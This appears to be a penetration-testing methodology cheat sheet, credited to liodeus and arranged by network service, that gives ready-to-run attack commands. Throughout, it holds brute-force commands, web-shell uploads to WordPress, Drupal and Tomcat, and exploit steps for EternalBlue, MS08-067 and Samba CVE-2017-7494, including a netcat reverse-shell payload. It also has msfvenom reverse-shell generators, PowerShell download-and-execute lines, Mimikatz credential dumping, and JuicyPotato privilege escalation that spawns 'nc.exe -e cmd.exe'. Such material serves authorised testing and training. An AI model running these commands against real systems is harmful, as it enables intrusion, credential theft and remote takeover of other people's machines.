The medology described here were “stolen” from liodeus with few adaptions
Original Author: liodeus
Sumário
Enumeration
NMAP
TCP
1
| sudo -sS -sC -sV -oA <NAME>.tcp <IP> -v
|
UDP
1
| sudo -sU -sS -sC -sV -oA <NAME>.udp <IP> -v
|
FTP - 21
Brute force
1
| hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> ftp://<IP> -u -vV
|
Downloading file
1
2
3
4
| ftp <IP>
PASSIVE
BINARY
get <FILE>
|
Uploading file
1
2
3
4
| ftp <IP>
PASSIVE
BINARY
put <FILE>
|
SSH - 22
Brute force
1
| hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> ssh://<IP> -u -vV
|
CVE-2008-0166
1
2
3
4
5
6
7
8
9
10
11
12
| All SSL and SSH keys generated on Debian-based systems (Ubuntu, Kubuntu, etc) between September 2006 and May 13th, 2008 may be affected.
https://www.exploit-db.com/exploits/5720
wget https://github.com/g0tmi1k/debian-ssh/raw/master/common_keys/debian_ssh_rsa_2048_x86.tar.bz2 https://github.com/g0tmi1k/debian-ssh/raw/master/common_keys/debian_ssh_dsa_1024_x86.tar.bz2
bunzip2 debian_ssh_rsa_2048_x86.tar.bz2 debian_ssh_dsa_1024_x86.tar.bz2
tar -xvf debian_ssh_rsa_2048_x86.tar
tar -xvf debian_ssh_dsa_1024_x86.tar
python 5720 rsa/2048 <IP> <USER> <PORT> <THREADS>
python 5720 dsa/1024 <IP> <USER> <PORT> <THREADS>
|
SSH backdoor - post exploitation
1
2
3
4
5
6
7
8
9
10
| # Attacker
ssh-keygen -f <FILENAME>
chmod 600 <FILENAME>
cat <FILENAME>.pub -> copy
# Victim
echo <FILENAME>.pub >> <PATH>/.ssh/authorized_keys
# Connect
ssh -i <FILENAME> <USER>@<IP>
|
DNS - 53
Zone transfert
1
2
| dnsrecon -d <DOMAIN> -a
dig axfr <DOMAIN> @ns1.test.com
|
DNS brute force
1
| https://github.com/blark/aiodnsbrute
|
FINGER - 79
User enumeration
1
2
| finger @<IP>
finger <USER>@<IP>
|
Command execution
1
2
| finger "|/bin/id@<IP>"
finger "|/bin/ls -a /<IP>"
|
HTTP - HTTPS - 80 - 443
Automatic scanners
1
2
| nikto -h <URL>
python crawleet.py -u <URL> -b -d 3 -e jpg,png,css -f -m -s -x php,txt -y --threads 20
|
Wordpress
1
2
3
4
5
| # Scan
wpscan --rua -e --url <URL>
# Brute force user(s)
wpscan --rua --url <URL> -P <PASSWORDS_LIST> -U "<USER>,<USER>"
|
Wordpress panel RCE
1
2
3
4
5
6
| Modifying a php from the theme used (admin credentials needed)
Appearance -> Editor -> 404 Template (at the right)
Change the content for a php shell
https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
http://<IP>/wp-content/themes/twentytwelve/404.php
|
Drupal
1
| droopescan scan -u <URL>
|
Username enumeration
1
2
3
4
5
6
7
8
9
10
11
12
| In /user/register just try to create a username and if the name is already taken it will be notified :
*The name admin is already taken*
If you request a new password for an existing username :
*Unable to send e-mail. Contact the site administrator if the problem persists.*
If you request a new password for a non-existent username :
*Sorry, test is not recognized as a user name or an e-mail address.*
Accessing /user/<number> you can see the number of existing users :
- /user/1 -> Access denied (user exist)
- /user/2 -> Page not found (user doesn't exist)
|
Hidden pages enumeration
1
2
3
4
| Fuzz /node/<NUMBER> where <NUMBER> is a number (from 1 to 500 for example).
You could find hidden pages (test, dev) which are not referenced by the search engines.
wfuzz -c -z range,1-500 --hc 404 <URL>/node/FUZZ
|
Drupal panel RCE
1
2
3
4
5
6
7
| You need the plugin php to be installed (check it accessing to /modules/php and if it returns a 403 then, exists, if not found, then the plugin php isn't installed)
Go to Modules -> (Check) PHP Filter -> Save configuration
https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
Then click on Add content -> Select Basic Page or Article -> Write php shellcode on the body -> Select PHP code in Text format -> Select Preview
|
Joomla
1
2
| joomscan -u <URL>
./joomlavs.rb --url <URL> -a -v
|
Tomcat
Default credentials
1
2
3
4
5
6
7
8
| The most interesting path of Tomcat is /manager/html, inside that path you can upload and deploy war files (execute code). But this path is protected by basic HTTP auth, the most common credentials are :
admin:admin
tomcat:tomcat
admin:<NOTHING>
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat
|
Brute force
1
| hydra -L <USERS_LIST> -P <PASSWORDS_LIST> -f <IP> http-get /manager/html -vV -u
|
Tomcat panel RCE
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| # Generate payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
# Upload payload
Tomcat6 :
wget 'http://<USER>:<PASSWORD>@<IP>:8080/manager/deploy?war=file:shell.war&path=/shell' -O -
Tomcat7 and above :
curl -v -u <USER>:<PASSWORD> -T shell.war 'http://<IP>:8080/manager/text/deploy?path=/shellh&update=true'
# Listener
nc -lvp <PORT>
# Execute payload
curl http://<IP>:8080/shell/
|
WebDav
HTTP brute force authentication
HTTP basic authentication
1
2
3
4
5
| # Hydra
hydra -l <USER> -V -P <PASSWORDS_LIST> -s 80 -f <IP> http-get /<URL_ENDPOINT>/ -t 15
# Patator
python patator.py http_fuzz auth_type=basic url=<URL> user_pass=FILE0 0=<USER:PASSWORD_LIST> -x ignore:code=401 -x ignore:code=307
|
HTTP GET request
1
| hydra <IP> -V -l <USER> -P <PASSWORDS_LIST> http-get-form "/login/:username=^USER^&password=^PASS^:F=Error:H=Cookie: safe=yes; PHPSESSID=12345myphpsessid" -t <THREADS_NUMBER>
|
HTTP POST request
1
| hydra -l <USER> -P <PASSWORDS_LIST> <IP> http-post-form "/webapp/login.php:username=^USER^&password=^PASS^:Invalid" -t <THREADS_NUMBER>
|
Spidering / Brute force directories / files
1
2
3
4
5
6
7
8
9
| gospider -d <DEPTHS> --robots --sitemap -t <THREADS> -s <URL>
ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u <URL>/FUZZ -e .php,.txt -t <THREADS>
dirbuster
Dictionaries :
- /usr/share/wordlists/dirb/common.txt
- /usr/share/wordlists/dirb/big.txt
- /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
File backups
Once you have found all the files, look for backups of all the executable files (“.php”, “.aspx“…). Common variations for naming a backup are
1
| file.ext~, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old
|
Local File Inclusion / Remote File Inclusion - LFI / RFI
1
| https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
|
Wrappers
Wrapper php://filter
1
| http://example.com/index.php?page=php://filter/convert.base64-encode/resource=
|
Wrapper expect://
1
| http://example.com/index.php?page=expect://id
|
Wrapper data://
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| echo '<?php phpinfo(); ?>' | base64 -w0 -> PD9waHAgcGhwaW5mbygpOyA/Pgo=
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pgo=
If code execution, you should see phpinfo(), go to the disable_functions and craft a payload with functions which aren't disable.
Code execution with
- exec
- shell_exec
- system
- passthru
- popen
# Exemple
echo '<?php passthru($_GET["cmd"]);echo "Shell done !"; ?>' | base64 -w0 -> PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=
If there is "Shell done !" on the webpage, then there is code execution and you can do things like :
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=&cmd=ls
|
1
| curl -k -v "http://example.com/index.php?page=php://input" --data "<?php echo shell_exec('id'); ?>"
|
Useful LFI list
1
2
3
4
5
6
7
8
| # Linux
/home/liodeus/wordlist/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
# Windows
/home/liodeus/wordlist/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt
# Both
/home/liodeus/wordlist/SecLists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt
|
1
2
| kadimus --url <URL>
python lfisuite.py
|
Command injection
For command injection always use BurpSuite !
1
| https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
|
Deserialization
1
| https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Deserialization
|
File upload
1
| https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files
|
SQL injection
1
2
3
| https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
https://cobalt.io/blog/a-pentesters-guide-to-sql-injection-sqli
|
XSS
1
2
3
4
5
| https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
beef-xss
cat /usr/share/beef-xss/config.yaml | grep user -C 1 # user / password
<script src="http://<IP>:3000/hook.js"></script>
|
Other web vulnerabilities
1
| https://github.com/swisskyrepo/PayloadsAllTheThings
|
Upload a file with PUT
1
| curl -X PUT http://<IP>/<FILE> -d @<FILE> -v
|
KERBEROS - 88
1
| https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
|
POP3 - 110
Brute force
1
2
| hydra -l <USER> -P <PASSWORDS_LIST> -f <IP> pop3 -V
hydra -S -v -l <USER> -P <PASSWORDS_LIST> -s 995 -f <IP> pop3 -V
|
Read mail
1
2
3
4
5
6
7
| telnet <IP> 110
USER <USER>
PASS <PASSWORD>
LIST
RETR <MAIL_NUMBER>
QUIT
|
SNMP - 161
1
| onesixtyone -c /home/liodeus/wordlist/SecLists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt <IP>
|
1
| snmpbulkwalk -c <COMMUNITY_STRING> -v<VERSION> <IP>
|
Modifying SNMP values
1
| http://net-snmp.sourceforge.net/tutorial/tutorial-5/commands/snmpset.html
|
LDAP - 389
Scans
1
2
3
4
| nmap -n -sV --script "ldap* and not brute"
ldapsearch -h <IP> -x -s base
ldapsearch -h <IP> -x -D '<DOMAIN>\<USER>' -w '<PASSWORD>' -b "DC=<1_SUBDOMAIN>,DC=<TDL>"
|
Graphical Interface
SMB - 445
Version if nmap didn’t detect it
1
2
3
4
5
6
| Sometimes nmap doesn’t show the version of Samba in the remote host, if this happens, a good way to know which version the remote host is running, is to capture traffic with wireshark against the remote host on 445/139 and in parallel run an smbclient -L, do a follow tcp stream and with this we might see which version the server is running.
OR
sudo ngrep -i -d <INTERFACE> 's.?a.?m.?b.?a.*[[:digit:]]' port 139
smbclient -L <IP>
|
Scan for vulnerability
1
| nmap -p139,445 --script "smb-vuln-* and not(smb-vuln-regsvc-dos)" --script-args smb-vuln-cve-2017-7494.check-version,unsafe=1 <IP>
|
If :
- MS17-010 - EternalBlue
- MS08-067 - MS08-067
- CVE-2017-7494
Manual testing
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| smbmap -H <IP>
smbmap -u '' -p '' -H <IP>
smbmap -u 'guest' -p '' -H <IP>
smbmap -u '' -p '' -H <IP> -R
crackmapexec smb <IP>
crackmapexec smb <IP> -u '' -p ''
crackmapexec smb <IP> -u 'guest' -p ''
crackmapexec smb <IP> -u '' -p '' --shares
enum4linux -a <IP>
smbclient --no-pass -L //$IP
smbclient //<IP>/<SHARE>
# Download all files from a directory recursively
smbclient //<IP>/<SHARE> -U <USER> -c "prompt OFF;recurse ON;mget *"
|
Brute force
1
2
| crackmapexec smb <IP> -u <USERS_LIST> -p <PASSWORDS_LIST>
hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> smb://<IP> -u -vV
|
Mount a SMB share
1
2
3
4
5
6
| mkdir /tmp/share
sudo mount -t cifs //<IP>/<SHARE> /tmp/share
sudo mount -t cifs -o 'username=<USER>,password=<PASSWORD>'//<IP>/<SHARE> /tmp/share
smbclient //<IP>/<SHARE>
smbclient //<IP>/<SHARE> -U <USER>
|
Get a shell
1
2
3
4
5
6
7
8
9
10
11
| psexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
psexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>
wmiexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
wmiexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>
smbexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
smbexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>
atexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP> <COMMAND>
atexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>
|
EternalBlue
1
| https://github.com/3ndG4me/AutoBlue-MS17-010
|
Check if vulnerable
1
| python eternal_checker.py <IP>
|
Prepare shellcodes and listeners
1
2
3
4
| cd shellcode
./shell_prep.sh
cd ..
./listener_prep.sh
|
Exploit
1
2
3
| python eternalblue_exploit<NUMBER>.py <IP> shellcode/sc_all.bin
May need to run it multiple times
|
If this doesn’t work, try this one
1
| python zzz_exploit.py <IP>
|
MS08-067
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| # Download exploit code
git clone https://github.com/andyacer/ms08_067.git
# Generate payload
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
msfvenom -p windows/shell_bind_tcp RHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
# Modify
Modify ms08_067_2018.py and replace the shellcode variable by the one generated with msfvenom.
# Listener
nc -lvp <PORT>
# Exploit
python ms08_067_2018.py <IP> <NUMBER> 445
|
CVE-2017-7494
1
2
| # Download exploit code
git clone https://github.com/joxeankoret/CVE-2017-7494
|
Create a new file named poc.c :
1
2
3
4
5
6
7
8
| #include <stdio.h>
#include <stdlib.h>
int samba_init_module(void)
{
setresuid(0,0,0);
system("ping -c 3 <IP>");
}
|
1
2
| # Build
gcc -o test.so -shared poc.c -fPIC
|
1
2
3
4
5
| # Start an ICMP listener
sudo tcpdump -i <INTERFACE> icmp
# Exploit
./cve_2017_7494.py -t <TARGET_IP> -u <USER> -P <PASSWORD> --custom=test.so
|
If you reiceve 3 pings on your listener then the exploit works. Now let’s get a shell :
1
2
3
4
5
6
7
8
| #include <stdio.h>
#include <stdlib.h>
int samba_init_module(void)
{
setresuid(0,0,0);
system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f");
}
|
1
2
| # Build
gcc -o test.so -shared poc.c -fPIC
|
1
2
3
4
5
| # Start a listener
nc -lvp <PORT>
# Exploit
./cve_2017_7494.py -t <TARGET_IP> -u <USER> -P <PASSWORD> --custom=test.so
|
MSSQL - 1433
1
| nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
|
Brute force
1
| hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mssql -vV -I -u
|
Having credentials
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| mssqlclient.py -windows-auth <DOMAIN>/<USER>:<PASSWORD>@<IP>
mssqlclient.py <USER>:<PASSWORD>@<IP>
# Once logged in you can run queries:
SQL> select @@ version;
# Steal NTLM hash
sudo smbserver.py -smb2support liodeus .
SQL> exec master..xp_dirtree '\\<IP>\liodeus\' # Steal the NTLM hash, crack it with john or hashcat
# Try to enable code execution
SQL> enable_xp_cmdshell
# Execute code
SQL> xp_cmdshell whoami /all
SQL> xp_cmdshell certutil.exe -urlcache -split -f http://<IP>/nc.exe
|
Manual exploit
1
2
| Cheatsheet :
- https://www.asafety.fr/mssql-injection-cheat-sheet/
|
NFS - 2049
Show Mountable NFS Shares
1
2
| showmount -e <IP>
nmap --script=nfs-showmount -oN mountable_shares <IP>
|
Mount a share
1
2
| sudo mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
sudo mount -v -t nfs -o vers=2 <IP>:<SHARE> <DIRECTORY>
|
NFS misconfigurations
1
2
| # List exported shares
cat /etc/exports
|
If you find some directory that is configured as no_root_squash/no_all_squash you may be able to privesc.
1
2
3
4
5
6
7
8
9
10
11
12
13
| # Attacker, as root user
mkdir <DIRECTORY>
mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
cd <DIRECTORY>
echo 'int main(void){setreuid(0,0); system("/bin/bash"); return 0;}' > pwn.c
gcc pwn.c -o pwn
chmod +s pwn
# Victim
cd <SHARE>
./pwn # Root shell
|
MYSQL - 3306
Brute force
1
| hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mysql -vV -I -u
|
1
2
| cat /etc/mysql/debian.cnf
grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
|
Connect
1
2
3
4
5
6
| # Local
mysql -u <USER>
mysql -u <USER> -p
# Remote
mysql -h <IP> -u <USER>
|
MySQL commands
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| show databases;
use <DATABASES>;
show tables;
describe <TABLE>;
select * from <TABLE>;
# Try to execute code
select do_system('id');
\! sh
# Read & Write
select load_file('<FILE>');
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE '<OUT_FILE>'
|
Manual exploit
1
2
| Cheatsheet :
- https://www.asafety.fr/mysql-injection-cheat-sheet/
|
RDP - 3389
Brute force
1
2
3
4
| crowbar -b rdp -s <IP>/CIDR -u <USER> -C <PASSWORDS_LIST>
crowbar -b rdp -s <IP>/CIDR -U <USERS_LIST> -C <PASSWORDS_LIST>
hydra -f -L <USERS_LIST> -P <PASSWORDS_LIST> rdp://<IP> -u -vV
|
Connect with known credentials / hash
1
2
3
4
5
| rdesktop -u <USERNAME> <IP>
rdesktop -d <DOMAIN> -u <USERNAME> -p <PASSWORD> <IP>
xfreerdp /u:[DOMAIN\]<USERNAME> /p:<PASSWORD> /v:<IP>
xfreerdp /u:[DOMAIN\]<USERNAME> /pth:<HASH> /v:<IP>
|
Session stealing
Get openned sessions
Access to the selected
1
| tscon <ID> /dest:<SESSIONNAME>
|
Adding user to RDP group (Windows)
1
| net localgroup "Remote Desktop Users" <USER> /add
|
VNC - 5800 - 58001 - 5900 - 5901
Scans
1
| nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -v -p <PORT> <IP>
|
Brute force
1
| hydra -L <USERS_LIST> –P <PASSWORDS_LIST> -s <PORT> <IP> vnc -u -vV
|
Connect
Found VNC password
Linux
1
| Default password is stored in: ~/.vnc/passwd
|
Windows
1
2
3
4
5
6
7
8
9
10
11
| # RealVNC
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
# TightVNC
HKEY_CURRENT_USER\Software\TightVNC\Server
# TigerVNC
HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4
# UltraVNC
C:\Program Files\UltraVNC\ultravnc.ini
|
Decrypt VNC password
1
2
3
4
5
6
| msfconsole
irb
fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
require 'rex/proto/rfb'
Rex::Proto::RFB::Cipher.decrypt ["2151D3722874AD0C"].pack('H*'), fixedkey
/dev/nul
|
WINRM - 5985 - 5986
Brute force
1
| crackmapexec winrm <IP> -u <USERS_LIST> -p <PASSWORDS_LIST>
|
Connecting
1
2
| evil-winrm -i <IP> -u <USER> -p <PASSWORD>
evil-winrm -i <IP> -u <USER> -H <HASH>
|
CGI
Found CGI scripts
1
2
3
| ffuf -w /home/liodeus/wordlist/SecLists/Discovery/Web-Content/CGI-XPlatform.fuzz.txt -u <URL>/ccgi-bin/FUZZ -t 50
ffuf -w /home/liodeus/wordlist/SecLists/Discovery/Web-Content/CGIs.txt -u <URL>/ccgi-bin/FUZZ -t 50
ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u <URL>/cgi-bin/FUZZ -e .sh,.pl,.cgi -t 100
|
If a script is found try SHELLSHOCK.
Command and control framework
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| # Download
git clone https://github.com/mhaskar/Octopus/tree/v1.2
# Install requirements
pip install -r requirements.txt
# Usage
./octopus.py
# Listener (exemple)
listen_http <BIND_IP> <BIND_PORT> <HOSTNAME> <INTERVAL_IN_SECONDS> <URL> <LISTENER_NAME>
listen_http 0.0.0.0 80 192.168.1.87 5 test.php listener_1
# Agent (exemple)
generate_powershell <LISTENER_NAME>
generate_powershell listener_1
|
Compiling exploits
For linux
1
2
3
4
5
| # 64 bits
gcc -o exploit exploit.c
# 32 bits
gcc -m32 -o exploit exploit.c
|
For windows
1
2
3
4
5
6
7
| To compile Win32 bit executables, execute i686-w64-mingw32-gcc -o <FILE.exe> <FILE.c>
To compile Win64 bit executables, execute x86_64-w64-mingw32-gcc -o <FILE.exe><FILE.c>
To Compiled .cpp source file, execute i586-mingw32msvc-g++ -o <FILE>.exe <FILE>.cpp
To compile python scripts, pyinstaller --onefile <SCRIPT.py>
# Compile windows .exe on Linux
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
|
Cross compile
1
| gcc -m32 -Wall -Wl,--hash-style=both -o gimme.o gimme.c
|
DICTIONARY GENERATION
1
| cewl -m <WORDS_SIZE> --with-numbers -w dictiFromWebsite <URL> -d <DEPTH>
|
1
| crunch 5 5 -f /usr/share/crunch/charset.lst mixalpha-numeric-all -t Test@ -o passwords.txt
|
FILE TRANSFER
Linux
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| # PYTHON
python -m SimpleHTTPServer <PORT>
python2.7 -c "from urllib import urlretrieve; urlretrieve('<URL>', '<DESTINATION_FILE>')"
# FTP
sudo python3 -m pyftpdlib -p 21 -w
# SMB
sudo smbserver.py -smb2support liodeus .
# WGET
wget <URL> -o <OUT_FILE>
# CURL
curl <URL> -o <OUT_FILE>
# NETCAT
nc -lvp 1234 > <OUT_FILE>
nc <IP> 1234 < <IN_FILE>
# SCP
scp <SOURCE_FILE> <USER>@<IP>:<DESTINATION_FILE>
|
Windows
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| # FTP
echo open <IP> 21 > ftp.txt echo anonymous>> ftp.txt echo password>> ftp.txt echo binary>> ftp.txt echo GET <FILE> >> ftp.txt echo bye>> ftp.txt
ftp -v -n -s:ftp.txt
# SMB
copy \\<IP>\<PATH>\<FILE> # Linux -> Windows
copy <FILE> \\<IP>\<PATH>\ # Windows -> Linux
# Powershell
powershell.exe (New-Object System.Net.WebClient).DownloadFile('<URL>', '<DESTINATION_FILE>')
powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('<URL>')
powershell "wget <URL>"
# Python
python.exe -c "from urllib import urlretrieve; urlretrieve('<URL>', '<DESTINATION_FILE>')"
# CertUtil
certutil.exe -urlcache -split -f "<URL>"
# NETCAT
nc -lvp 1234 > <OUT_FILE>
nc <IP> 1234 < <IN_FILE>
# CURL
curl <URL> -o <OUT_FILE>
|
GIT
Download .git
1
2
| mkdir <DESTINATION_FOLDER>
./gitdumper.sh <URL>/.git/ <DESTINATION_FOLDER>
|
1
2
| mkdir <EXTRACT_FOLDER>
./extractor.sh <DESTINATION_FOLDER> <EXTRACT_FOLDER>
|
HASHES
Windows
1
2
3
4
| reg save HKLM\SAM c:\SAM
reg save HKLM\System c:\System
samdump2 System SAM > hashes
|
Linux
1
| unshadow passwd shadow > hashes
|
MIMIKATZ
1
2
3
4
5
6
7
8
9
10
11
| sekurlsa::logonpasswords
sekurlsa::tickets /export
kerberos::list /export
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
|
MISCELLANEOUS
Get a Windows path without spaces
1
2
3
4
5
6
| # path.cmd
@echo off
echo %~s1
path.cmd "C:\Program Files (x86)\Common Files\test.txt"
C:\PROGRA~2\COMMON~1\test.txt -> Valid path without spaces
|
MSFVENOM PAYLOAD
Linux
1
| msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
|
Windows
1
| msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
|
PHP
1
2
3
4
| msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php
Then we need to add the <?php at the first line of the file so that it will execute as a PHP webpage
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
|
ASP
1
| msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
|
JSP
1
| msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
|
WAR
1
| msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
|
Python
1
| msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py
|
Bash
1
| msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh
|
Perl
1
| msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<PORT> -f raw > shell.pl
|
Listener
1
2
3
4
5
6
| use exploit/multi/handler
set PAYLOAD <PAYLOAD>
set LHOST <LHOST>
set LPORT <LPORT>
set ExitOnSession false
exploit -j -z
|
Netcat
PASSWORD CRACKING
Online
1
2
| Decrypt MD5, SHA1, MySQL, NTLM, SHA256, SHA512 hashes
https://hashes.com/en/decrypt/hash
|
Hashcat
Linux password
1
2
| hashcat -m 1800 -a 0 hash.txt rockyou.txt
hashcat -m 1800 -a 0 hash.txt rockyou.txt -r OneRuleToRuleThemAll.rule
|
Windows password
1
2
| hashcat -m 1000 -a 0 hash.txt rockyou.txt
hashcat -m 1000 -a 0 hash.txt rockyou.txt -r OneRuleToRuleThemAll.rule
|
Others
1
| hashcat --example-hashes | grep -i '<BEGINNING_OF_HASH>'
|
Rules
1
| https://github.com/NotSoSecure/password_cracking_rules
|
John
1
| john --wordlist=<PASSWORDS_LIST> hash.txt
|
PIVOTING
Sshuttle
1
| sshuttle <USER>@<IP> <IP_OF_THE_INTERFACE>/CIDR
|
Proxychains
1
2
| ssh -f -N -D 9050 <USER>@<IP>
proxychains <COMMAND>
|
Interesting link
1
| https://artkond.com/2017/03/23/pivoting-guide/
|
PRIVILE ESCALATION
Linux
Enumeration scripts
1
2
3
4
5
| bash LinEnum.sh
bash lse.sh -l 1
bash linpeas.sh
python linuxprivchecker.py
./unix-privesc-check standard
|
Vulnerability scan
1
2
| perl les2.pl
bash les.sh
|
Suid checker
1
2
3
| python suid3num.py
https://gtfobins.github.io/
|
Methodology to follow
1
2
| https://guif.re/linuxeop
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| sudo -l
Kernel Exploits
OS Exploits
Password reuse (mysql, .bash_history, 000- default.conf...)
Known binaries with suid flag and interactive (nmap)
Custom binaries with suid flag either using other binaries or with command execution
Writable files owned by root that get executed (cronjobs)
MySQL as root
Vulnerable services (chkrootkit, logrotate)
Writable /etc/passwd
Readable .bash_history
SSH private key
Listening ports on localhost
/etc/fstab
/etc/exports
/var/mail
Process as other user (root) executing something you have permissions to modify
SSH public key + Predictable PRNG
apt update hooking (PreInvoke)
|
Windows
Enumeration scripts
General scans
1
2
3
4
5
6
| winPEAS.exe
windows-privesc-check2.exe
Seatbelt.exe -group=all
powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
Powerless.bat
winPEAS.bat
|
Search for CVE
1
2
3
4
5
6
7
8
9
10
| systeminfo > systeminfo.txt
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --database <DATE>-mssb.xlsx --systeminfo systeminfo.txt
systeminfo > systeminfo.txt
wmic qfe > qfe.txt
python wes.py -u
python wes.py systeminfo.txt qfe.txt
powershell -exec bypass -command "& { Import-Module .\Sherlock.ps1; Find-AllVulns; }"
|
Post exploitation
1
2
3
| lazagne.exe all
SharpWeb.exe
mimikatz.exe
|
JuicyPotato (SeImpersonate or SeAssignPrimaryToken)
1
2
3
4
5
6
7
| If the user has SeImpersonate or SeAssignPrimaryToken privileges then you are SYSTEM.
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c nc.exe <IP> <PORT> -e c:\windows\system32\cmd.exe" -t *
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c nc.exe <IP> <PORT> -e c:\windows\system32\cmd.exe" -t * -c <CLSID>
# CLSID
https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
|
Methodology to follow
1
2
3
4
5
| https://guif.re/windowseop
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
https://mysecurityjournal.blogspot.com/p/client-side-attacks.html
http://www.fuzzysecurity.com/tutorials/16.html
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
|
Autorun
Detection
1
2
3
4
5
6
7
| powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
[*] Checking for modifiable registry autoruns and configs...
Key : HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\My Program
Path : "C:\Program Files\Autorun Program\program.exe"
